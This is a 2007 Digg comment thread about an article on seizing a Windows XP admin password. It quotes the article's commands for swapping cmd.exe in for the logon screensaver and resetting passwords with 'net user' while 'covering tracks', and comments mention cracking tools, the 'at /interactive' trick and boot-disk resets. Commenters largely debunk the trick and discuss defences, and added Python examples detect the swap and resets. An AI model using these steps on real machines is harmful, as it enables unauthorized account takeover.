How To Hack a Windows XP Admin Password
internetbusinessdaily.net — Here is exactly how to hack a Windows XP Admin Password and not get caught. Have fun.
- 2861 diggs
- subgeniusd, on 10/12/2007, -6/+13I also changed the admin name to something long and strange so you still can't log on.
- Bigbro69, on 10/12/2007, -1/+34Not that you can type.. 'net user' or anything to find it out.
- skyshock21, on 10/12/2007, -5/+60A) If you have access to System32, you already have admin access
B) Correct me if I'm wrong, but this only works on Win2K machines as there is a patch for XP that corrects this.
Marked as LAME.
- hammydude, on 10/12/2007, -33/+25http://www.duggmirror.com
- TigonLiger, on 10/12/2007, -0/+10Marked as inaccurate. Unless you already have admin rights, you'll get "access denied" when you try to create a dir inside system32. If you can create a dir in system32 then you can probably already do whatever you want on the system anyway. Pointless and inaccurate.
- f3l1x, on 10/12/2007, -0/+0I do not see how you won't get caught... Pretty bold statement.
This is just like adding explorer (or cmd) to an "at" job then closing your shell and waiting one minute.
I don't mean to talk it down.. It's all fun stuff and worth the digg.. I just would not say "you won't get caught".
- SmokeN-DC, on 10/12/2007, -3/+24the main problem with this is most non-admin users do not have access to the system32 directory
I need to check this. Anyone know if this is correct?
- downlo, on 10/12/2007, -5/+18Not really since a Linux LiveCD will be able to mount the NTFS drive and monkey with the SAM files. In all honesty the only way to prevent this is disabling all boot devices except the HDD and passwording the BIOS.
- merreborn, on 10/12/2007, -1/+90"In all honesty the only way to prevent this is disabling all boot devices except the HDD and passwording the BIOS."
Even then you can either just clear the BIOS, or take the drive out and put it in another system.
If you've got physical access to a PC, it's already compromised.
- MasterChi, on 10/12/2007, -26/+6That's why you enable "Lock Case" in the BIOS and you can't take the drive out. Also how will you clear the BIOS if 1. you don't have admin access to install programs and 2. you can't get inside the case to pull the jumper. True you could still manually get in the case but the time it takes is a bit and the fact that you need the correct HEX driver to loosen those screws so.....
- foxhoundadmin, on 10/12/2007, -6/+17i like the one where they blow up the truck.
- vertinox, on 10/12/2007, -8/+4@"True you could still manually get in the case but the time it takes is a bit and the fact that you need the correct HEX driver to loosen those screws so....."
Nothing a pair of pliers, wirecutters, flathead screwdriver, and a hammer would resolve.
You didn't want the case back in one piece right?
- n00tz, on 10/12/2007, -1/+29"That's why you enable "Lock Case" in the BIOS and you can't take the drive out. Also how will you clear the BIOS if 1. you don't have admin access to install programs and 2. you can't get inside the case to pull the jumper. True you could still manually get in the case but the time it takes is a bit and the fact that you need the correct HEX driver to loosen those screws so....."
You must be one of those 'A+ Certified' computer users that have never spent a day inside the computer, if you're even certified. Most new computers (Dell especially) don't take anything more than pushing a button to get inside the case. Once inside the case it doesn't take anything more than popping the BIOS battery out of the motherboard and unplugging the power cord (and sometimes hit the power button to discharge any of the capacitors on the motherboard) to reset the BIOS.
If that was even an issue, I then insert my Linux bootable CD, or USB Flash drive and boot to a linux kernel: mount NTFS. manipulate SAM. reboot. DING! FRIES ARE DONE.
BTW, no digg. old news.
- ernkush, on 10/12/2007, -0/+4@merreborn
You are right, but under most circumstances you could also lock your case and encrypt your hdd when you turn the computer off. It would take far too long for a potential cracker to break the system for him not to be noticed.
- Ahnteis, on 10/12/2007, -0/+5That's why you restrict physical access to your server. If you can get to it to boot it to linux, you can just put a hardware keylogger on the back and steal the admin key, or any number of other obvious "hacks".
Physical security is as important as software security.
- ElliotShoe, on 10/12/2007, -3/+2ROFL @ MasterChi
Props to n00tz
- piratebill, on 10/12/2007, -2/+3or just buy a lock for your case and set only the hard drive to boot. Password protect the bios as well.
link for case lock
http://www.cyberguys.com/templates/searchdetail.asp?ProductID=4112
- stevetures, on 10/12/2007, -0/+4The way to foil the Linux LiveCD / LiveFloppy is to use EFS (encryption) on the local admin account. They can change the password hash but they won't be able to use the new hash to decrypt any of the profile contents, and the login will fail.
You could probably beat this if you use a password cracker, and not a hash replacer. Beating the password cracker involves disabling lanman hashes (using only NTLMv2) and using a strong password.
- MasterChi, on 10/12/2007, -9/+0@nootz - you've never seen a computer, have you? Push a button lol that's great...what's the whole point of a locked case when all you have to do IS PUSH A BUTTON ? freaking idiot. I already explained how to clear the BIOS once inside the case so why did you repeat me ? Also how could you boot from CD/Flash once it's all disabled in the BIOS. You fools really don't read do you, just like to comment on nonsense. Get a computer and learn something and stop posting on your PSP or whatever nonsensical device you have.
- Airlines007, on 10/12/2007, -12/+0thats why you copy the temphack back in while you are in the admins account
- Andrew916, on 10/12/2007, -11/+4If you can move these files you already have administrative access. If you can't move these files you will need to do it through a boot disk. This used to be easy when all of the computers were using fat32 by default. Now that they are using NTFS, things are more difficult.
Anyway, thanks for the useless article. I'm glad to see you tried it before you posted it.
- AngryBacon, on 10/12/2007, -19/+19http://duggmirror.com
- adidos, on 10/12/2007, -24/+3I think you meant http://duggmirror.com/ - but it still doesn't load correctly...ugh. Get a better webhost!
- 2012, on 10/12/2007, -5/+23"This Account Has Exceeded Its CPU Quota" whatever was there, isn't anymore.
- ImTheDarkcyde, on 10/12/2007, -1/+27just do a google, literally nine hundred thousand identical tutorials exist
- radu5er, on 10/12/2007, -0/+1@ ImTheDarkcyde
"just do a google, literally nine hundred thousand identical tutorials exist"
Absolutely!
Only people who are not adept at "The Google" ;) don't know how easily bios and windows passwords can be cracked. If an individual has physical access to the machine, you are basically had. THE major part of system security is to limit access to the hardware and any system admin worth his salt knows this.
- vinbob, on 10/12/2007, -2/+16If you're physically at the PC just boot from a UBCD and change the admin password...
http://www.ultimatebootcd.com
- vinbob, on 10/12/2007, -1/+4BTW this can also reactivate locked admin accounts too.
- lustre, on 10/12/2007, -1/+29All bets are off if someone has physical access to the machine. Any machine. Any OS.
- billyboobs34, on 10/12/2007, -2/+3ntpasswd is smaller and faster
- dicerandom, on 10/12/2007, -4/+3@lustre:
Unless you have an encrypted root filesystem, that is.
http://www.linuxjournal.com/article/7743
- dfndoe, on 10/12/2007, -0/+6Unless your machine is part of a domain... If you use the UBCD to get admin you need to wipe the domain key which will break the domain relationship and then the real admin will know you monkeyed with it.... YMMV..
- bryhhh, on 10/12/2007, -0/+3@dfndoe
Not true, you can reset the admin password without breaking the domain membership. In fact, I've never heard of this happening and this is a very common practice (for legitimate reasons) where I work.
- Ahnteis, on 10/12/2007, -0/+6If you change the password, they'll know you were in anyway.
- shalex, on 10/12/2007, -0/+0Try to clear CMOS password of my ThinkPad T-series (2-levels BIOS passwords) and then mount my ntfs-formatted hdd, which is encrypted with Pointsec (http://www.pointsec.com/products/laptop/)
I bet you can't even get through BIOS part.
- chubbymidget, on 10/12/2007, -3/+46Followed by how to get your hosted account suspended!
- ahill7, on 10/12/2007, -2/+6People should stop digging a story that doesn't even exist. Plus like its been said, not really a new idea.
- teh_toaster, on 10/12/2007, -4/+36Article Text:
How to Hack a Windows XP Admin's Password
November 2nd, 2006 by Quinn Zerfas
This is a cool little trick I've picked up in my travels and decided to share it with you fine and ethical individuals =). Log in and go to your DOS command prompt and enter these commands exactly:
cd \
cd \windows\system32
mkdir temphack
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit
So what you just told windows to do is back up the command program and the screen saver file, then put the command program in the screen saver's place. When windows loads the logon screen saver, you will get an unprotected command prompt without logging in. When this appears enter the command in parentheses (net user <username> <password>). So if the admin user name is Doug and you want the password 1234 then you would enter "net user Doug 1234" and now you've changed the admin password to 1234. Log in, do what you want to do, copy the contents of temphack back into system32 to cover your tracks.
- boberto, on 10/12/2007, -3/+59Cover your tracks?
Yeah, they won't notice their admin password has changed or anything.
- cred911, on 10/29/2007, -0/+0not working... access denied :( can't change password.. net user administrator * :( without login as power user :( :(
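The swap quoted above leaves file-level traces whatever the password ends up being: the "screensaver" is now cmd.exe, the real cmd.exe is gone or duplicated, and a temphack directory sits in system32 even after the "cover your tracks" step. The following is an added example of the check an admin would run against a stored baseline; it is not code from the thread or from the quoted article. The file names and the temphack directory come from the article; the baseline dictionary and the fake file contents that build_fixture() writes are constructed so the check runs offline on any OS.

```python
"""Added example: baseline-and-compare check for the logon.scr / cmd.exe swap.
Not code from the Digg thread or the quoted article.  File names follow the
article; the fixture contents are constructed stand-ins, not real PE files."""
import hashlib
import os
import tempfile

WATCHED = ("logon.scr", "cmd.exe")   # the two binaries the article swaps
LEFTOVER_DIR = "temphack"            # backup directory the article creates


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def baseline(system32):
    """Hash the watched binaries on a known-good system; keep the result off
    the box, since anyone who can write system32 can also edit a local file."""
    return {name: sha256_of(os.path.join(system32, name)) for name in WATCHED}


def audit(system32, known_good):
    """Return a list of findings; an empty list means no trace of the swap."""
    findings = []
    current = {}
    for name in WATCHED:
        path = os.path.join(system32, name)
        if not os.path.exists(path):
            findings.append(f"{name} is missing")       # 'rename cmd.exe logon.scr'
            continue
        current[name] = sha256_of(path)
        if current[name] != known_good.get(name):
            findings.append(f"{name} differs from the baseline")
    # An attacker who copied instead of renaming leaves both files identical.
    if "logon.scr" in current and current["logon.scr"] == current.get("cmd.exe"):
        findings.append("logon.scr is byte-identical to cmd.exe (shell installed as screensaver)")
    # Restoring the files from temphack does not remove the directory itself.
    if os.path.isdir(os.path.join(system32, LEFTOVER_DIR)):
        findings.append(f"leftover {LEFTOVER_DIR} directory present")
    return findings


def build_fixture(state):
    """Constructed stand-in for %windir%\\system32 with fake contents.
    state: "clean", "article" (del logon.scr; rename cmd.exe logon.scr)
    or "copied" (cmd.exe copied over logon.scr, original kept)."""
    d = tempfile.mkdtemp()
    cmd, scr = b"MZ fake cmd.exe", b"MZ fake logon.scr"
    files = {"clean": {"cmd.exe": cmd, "logon.scr": scr},
             "article": {"logon.scr": cmd},
             "copied": {"cmd.exe": cmd, "logon.scr": cmd}}[state]
    for name, data in files.items():
        with open(os.path.join(d, name), "wb") as f:
            f.write(data)
    if state != "clean":
        os.mkdir(os.path.join(d, LEFTOVER_DIR))
    return d


def demo():
    """Audit each fixture state against a baseline taken from a clean one."""
    known_good = baseline(build_fixture("clean"))
    return {s: audit(build_fixture(s), known_good) for s in ("clean", "article", "copied")}


if __name__ == "__main__":
    for state, findings in demo().items():
        print(state, findings or ["no findings"])
```

The baseline comparison is what actually matters; the byte-identical and leftover-directory checks are cheap extras that still fire when the baseline was never taken. On a real box the same comparison belongs in whatever integrity tooling you already run, with the hashes stored somewhere the local Administrators group cannot reach.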
- ahill7, on 10/12/2007, -17/+2isn't this the same as hitting F8 at boot time and selecting SafeMode with Command Prompt?
I wish I could bury again.
- gblackbox, on 10/12/2007, -3/+3Assuming we "enter these commands exactly", what's the purpose of the temphack directory if you never copy anything into it?
Strike that, I just realized for some reason your "\" are missing.
- krishna88, on 01/05/2008, -0/+0hey...the command is right....he just left out a space....it is "COPY LOGON.SCR TEMPHACK LOGON.SCR" so that it gets copied to the temphack folder.
- thestorey, on 10/12/2007, -0/+37ophcrack live cd
http://ophcrack.sourceforge.net/
- Neolit, on 10/12/2007, -0/+7a single most useful link in this post.
Tried ophcrack. Works as a charm. It will tell you all passwords on the system unless they are really complex... It is also a very useful tool to test your system password. If ophcrack gets it - change it, 'cos it's no good :-)
The point is to find out the password not to change it.
If you wish to change the password then just use ERD 2005 or up.
- BuddhaChu, on 10/12/2007, -7/+4rainbowcrack > ophcrack (more rainbow tables used therefore more passwords cracked)
http://www.rainbowcrack.com/
- Tiak, on 10/12/2007, -4/+2Or the ever-classic http://s-t-d.org/ it has plenty of other uses the ones you advertise don't, but of course lacks the more rarely used cracking abilities.
- jamend, on 10/12/2007, -0/+5I especially like Hak5's http://sys9five.ath.cx:8080/hak5rtables/, which gives you online access to all-character rainbow tables (not 100% complete but close), so you just paste in a hash and it gives you the password. You can use pwdump6 (http://www.foofus.net/fizzgig/pwdump/, pwdump.exe in PwDumpRelease) to get the contents of the SAM hash file from within Windows and without a reboot.
Also, to help protect yourself from this attack, you can disable LanManager password hashes (which are on by default in XP) by going to HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Lsa in the registry, creating a new DWORD value called "NoLMHash", and giving it a value of 1.
PS: The advantage of finding the password instead of replacing it as per the article (whose instructions don't work on an up-to-date 2K/XP system anyways) is that you will be able to access EFS-encrypted files, and the administrator won't notice that you got access in the first place because the password isn't changed.
- Providence, on 10/12/2007, -1/+2Tried ophcrack on my local. Works flawlessly (even includes a helpfile, lol). Took less than 5 minutes to get it :-/
Now lemme try this on my dual booted laptop....See if I can crack the windows pw from Linux. That should be fun.
- Pseudo98, on 10/12/2007, -13/+6Pathetic, poorly researched and inaccurate
- klawz, on 10/12/2007, -1/+8actually it was accurate, back in 1997-1998
- Drull, on 10/12/2007, -1/+5Uh, you were using WINDOWS XP back in 97?
Not a man, but a god!
- mhaluza, on 10/12/2007, -2/+10find yourself a copy of ERD commander on a P2P network. It's a bootable live CD that can change Windows admin and user passwords as well as many other techie features (disk wipe, data backup, network access...etc.)
this article is too dirty of a hack compared to the dozens of software applications like the one mentioned that can do that and much more
- jimmiejaz, on 10/12/2007, -2/+1ERD is great, it might be a great shame sysinternals was bought by MS, they may stop producing ERD.
- landmonster, on 10/12/2007, -12/+1This was on here months ago. What a load of *****. I hate whoever posted this.
- zodiacal, on 10/12/2007, -1/+3and it will prevent anyone from ever reading encrypted files
- spac3m0nk3y, on 10/12/2007, -3/+5Just use that Linux utility thingy: http://home.eunet.no/pnordahl/ntpasswd/bootdisk.html
- willgonz, on 10/12/2007, -6/+6You can do this with the AT Command. The AT command runs all its passwords with NT AUTHORITY\SYSTEM.
Get to a command prompt.
type AT /interactive cmd.exe
Example:
C:\> at 1:43pm /interactive cmd.exe
Wait for the time to come and a command prompt will come up. Everything from that point on has elevated privileges. Every program you run has the elevated privileges. Handy if you need to change permissions to registry keys.
- dioscaido, on 10/12/2007, -4/+6Of course, you need to already have Administrator privileges to schedule the job... so what's the point?
- bryan986, on 10/12/2007, -1/+9This doesn't always work, many times you will just get an "Access denied" message when trying to use the "at" command as a limited user account
- fr0z3nph03n1x, on 10/12/2007, -1/+8If you have AT ability already, the admin did something wrong....
- Legolover64, on 10/12/2007, -2/+2And if you're at a computer where 1) The BIOS is locked, 2) The command prompt isn't accessible and 3) The screensaver doesn't turn on, are you screwed? I'm in this situation every day, but accessing the drives is out of the question (computer lab, heh), but I'd still like to possibly mess around...
Any suggestions?
- ahill7, on 10/12/2007, -4/+2Depends if you can get on the same LAN with another machine and run a Knoppix or other Linux that has terminal services so you can boot over the network (PXE) (I know our on-campus labs are all Dells and you can easily hit F12 to go to that "temporary" boot selection screen).
- SpookyET, on 10/12/2007, -2/+25How come these "knowledgeable" idiots do not know 5 years later that "Command Prompt" is not DOS? XP is not built on top of DOS. It's not 9x.
Is DOS still there? Yes, for compatibility reasons. Type "command.com" in Run to get to DOS. CMD.exe is not DOS.
- Ssullivan, on 10/12/2007, -10/+2Agreed. Marked as lame.
- klawz, on 10/12/2007, -2/+6yes! someone with a brain.
For those who care to know, but were afraid to ask: (no not THAT Leo!)
http://ask-leo.com/whats_the_difference_between_commandcom_and_cmdexe.html
- hammydude, on 10/12/2007, -11/+1www.duggmirror.com
- iAlex, on 10/12/2007, -3/+5Bluehost + Digg = not good. Bluehost seem to be a bad host.
- Crazyiodudo, on 10/12/2007, -3/+18Wow, how many more duggmirror comments can you guys put?
We get it.
- flarn2006, on 10/12/2007, -16/+8At least five:
http://www.duggmirror.com
http://www.duggmirror.com
http://www.duggmirror.com
http://www.duggmirror.com
http://www.duggmirror.com
lol
- Jarasmen, on 10/12/2007, -9/+5If only I could bury this... Can someone finally fix the problem with the bury button in Opera 9.02 please?
- DeusMachinae, on 10/12/2007, -10/+6No.
- SpookyET, on 10/12/2007, -2/+5Use shift + arrow keys to navigate using the keyboard in Opera and press enter.
- Jarasmen, on 10/12/2007, -1/+2Great, it works! Thanks!
- cquinnd, on 10/12/2007, -0/+1Yes, SpookyET, thank you for that tip.
- anomalya, on 10/12/2007, -1/+2if you change the pass then they know someones was messing with it, better to just get the pass, with ophcrack
- BigBrother87, on 10/12/2007, -1/+1Agreed, and much more fun that way.
- klawz, on 10/12/2007, -1/+0or LCP if it's a lame pw
- boneill428, on 10/12/2007, -0/+16i miss the days of windows 95 where kids thought they were "hacking" when they hit the cancel button at the login screen
- eXCubed, on 10/12/2007, -4/+1If you have sufficient rights to muck with files in the Windows directory, you're probably already an admin. Either that or the disk is formatted using FAT which is a bad idea.
- weedian, on 10/12/2007, -5/+0It's not like it's anything special.
This is like a script kiddie thinking he's a Leet Haxor
- ivanmarsh, on 10/12/2007, -1/+5Lame! A hack that requires you to be logged into the machine to set up the hack isn't a hack. If you're already logged into the machine what do you need the hack for?
- BostonMark, on 10/12/2007, -6/+1As others have said before me:
Start > Run > "cmd" [Enter]
net user Administrator [YOUR-NEW-PASSWORD]
I wrote about this a long time ago:
http://www.allthingsmarked.com/2006/08/21/change-your-xp-password-via-the-command-line/
- unrealmp3, on 10/12/2007, -5/+0If the PXE boot is still active on the desktop computer, bring a laptop and a crossover cable, and "remote boot" the local computer with another OS from the laptop ;)
- repruhsent, on 10/12/2007, -0/+1...and since the laptop won't get you any further past security anyway, so this is totally useless and stupid, just like the "hack" in the article.
- johnstar, on 10/12/2007, -7/+3ophcrack ownz joor box MUHAHAHAHAHAHAHAH!
- ianmurrays, on 10/12/2007, -2/+3you really need administrator or system privileges to access system32, so what's the point??
- laxmaniac3773, on 10/12/2007, -1/+5if you're logged in as an admin but you wanna have some fun with the other people logged into the computer then type
control userpasswords2
then you can reset passwords all day long if you like
heck, you can even remove whole user accounts with the click of a button. no questions asked!
- fubes2000, on 10/12/2007, -1/+1why isn't duggmirror working for me on this? All I get is the fancy banner and stuff from the top of the page, but no text.
Anyone have this problem?
- dave8555, on 10/12/2007, -0/+2lame and assumes that the admin of the computer has put no security in place.
- nytsua, on 10/12/2007, -0/+3marked as lame... hacking the admin password when you already have to have admin privileges to do the hack... not hacking.
- neosublime, on 10/12/2007, -0/+1If you're gonna go as far as to reset the admin password, then you might as well use something like the "Trinity Rescue Kit".
http://trinityhome.org/Home/blog.php?blog_cat_id=2&b_node=2
Finally a newer version than the one I still keep stored away in my back pack.
- XPMasterGuru, on 10/12/2007, -0/+0Should we discuss Group Policy Settings?
- repruhsent, on 10/12/2007, -0/+1This would only work for any user if you formatted the filesystem that stores %windir% as FAT32; otherwise, you need to be a member of the Administrators group or some other group with write access to %windir% et al.
In other words, this is totally useless.
- moonwell, on 10/12/2007, -0/+1yeah repru knows the answer, so why don't we put this to the other windows craps into the spam.
- grumpyrain, on 10/12/2007, -0/+2Just like the past thousand of these hacks on digg, you need administration privilleges to start with (if you plan on putting anything inside system32 or using AT). Of course you could boot a live CD and change SAM yourself, but then again the same hack would work on any OS. No physical control of machine = no chance.
/ Inaccurate
- ThinkFr33ly, on 10/12/2007, -0/+3Wow, this is stupid.
First, there is no such thing as a "hack" that FIRST requires you to have admin access.
Second, any admin who cares about their machine's security has security event logging on. This means that any changes to security leave an event in the event log. An event which, even if you delete it, leaves another event. In other words, it will tell them exactly who did this.
Very, very lame.
- Loki122, on 10/12/2007, -1/+1O the mischief I could cause....
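ThinkFr33ly's point above (and Ahnteis's and boberto's earlier: change the password and they will know) can be turned into a concrete detection. The following is an added example, not part of the thread: it scans constructed Security-log records for the two traces a reset of this kind leaves. The event IDs are the real ones (628 "User Account password set" and 517 "The audit log was cleared" on XP/2003; 4724 and 1102 on Vista and later); the tab-separated record format and the sample records are constructed for the demo, not an actual export. Treating a caller of SYSTEM or a machine account (NAME$) as the LocalSystem context, which is what a shell launched from the logon screensaver runs as, is an assumption you should confirm against how your own logs render it.

```python
"""Added example: detect password resets and log clearing in Security-log
records.  Not code from the thread.  Event IDs are real; the record format,
the SAMPLE_LOG rows and the SYSTEM-context heuristic are constructed."""
import csv
import io

PASSWORD_RESET = {"628", "4724"}   # someone set another account's password
LOG_CLEARED = {"517", "1102"}      # the Security log was cleared

# Constructed export: time, event id, target account, caller account.
# Row 2 is the article's reset done from a SYSTEM shell; row 4 is an ordinary
# self-service password change (627) and should not alert.
SAMPLE_LOG = """\
time\tevent_id\ttarget\tcaller
2007-10-12 09:01:13\t528\tDoug\tDoug
2007-10-12 12:44:02\t628\tDoug\tWORKSTATION$
2007-10-12 12:45:30\t528\tDoug\tDoug
2007-10-12 13:02:10\t627\tDoug\tDoug
2007-10-12 13:05:41\t517\t-\tDoug
"""


def parse(text):
    """Read the tab-separated export into a list of dicts."""
    return list(csv.DictReader(io.StringIO(text), delimiter="\t"))


def is_system_context(caller):
    """Assumption: LocalSystem shows up as SYSTEM or as the machine account."""
    return caller == "SYSTEM" or caller.endswith("$")


def detect(records):
    """Return one alert string per suspicious record, in log order."""
    alerts = []
    for r in records:
        eid = r["event_id"]
        if eid in PASSWORD_RESET:
            msg = f"{r['time']}: password of {r['target']} reset by {r['caller']}"
            if is_system_context(r["caller"]):
                msg += " (SYSTEM context: not done from a person's interactive logon)"
            alerts.append(msg)
        elif eid in LOG_CLEARED:
            # Clearing the log is itself the first record of the fresh log.
            alerts.append(f"{r['time']}: Security log cleared by {r['caller']}")
    return alerts


def demo():
    return detect(parse(SAMPLE_LOG))


if __name__ == "__main__":
    for line in demo():
        print(line)
```

A reset (628/4724) is distinct from a change (627/4723): a change requires the old password and is what a user does for themselves, a reset is what an administrator, or a SYSTEM shell, does to someone else. That distinction, plus the caller, is what lets the admin tell "Doug changed his password" from "something running as the machine set Doug's password at 12:44 while nobody was logged on".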
- MLyzz, on 10/12/2007, -0/+2Sorry kiddies, might work for a typical home machine, not for a college (protected reasonably well) or net login machine. Good luck. Want to crack ANY admin password? Use linux.
- gnixon70, on 10/12/2007, -0/+1cracking a non active directory windows machine is easy if you can boot from a CD. I've seen a CD that will blank out the admins p/w, add a user name with admin privileges, elevate an existing user. another CD I've seen will give you the password of all the user names on the machine. Of course the best defense against this is to make the CD ROM (and "a" drive) boot after the hard drive and put in a bios password.
- cRaCKh0rN, on 10/12/2007, -1/+1Ummmm buried as lame.
- prammy, on 10/12/2007, -0/+3This will only work on machines which use FAT32 as the filesystem.
On any NTFS based XP machine, you need admin privileges to copy anything to System32.
Article is inaccurate and author needs to talk to his/her IT dept as to why they format their machines with a FAT32 filesystem.
- esc27, on 10/12/2007, -0/+1It could be used effectively with other approaches such as social engineering (e.g. convince the admin to run a program containing a script that does this.)
This sort of technique (I've used startup scripts myself) is useful for testing things that should run at startup (e.g. (batch) startup scripts (if set to run visible.)) Cause the command prompt to open on startup, and then manually run a startup script from there. Since it is in a cmd window, it will stay open and you can look at its output to find any problems.
- yahwho, on 10/12/2007, -1/+0First step: Log in!
Holy cr@p! This made Digg? Talk about lowering standards.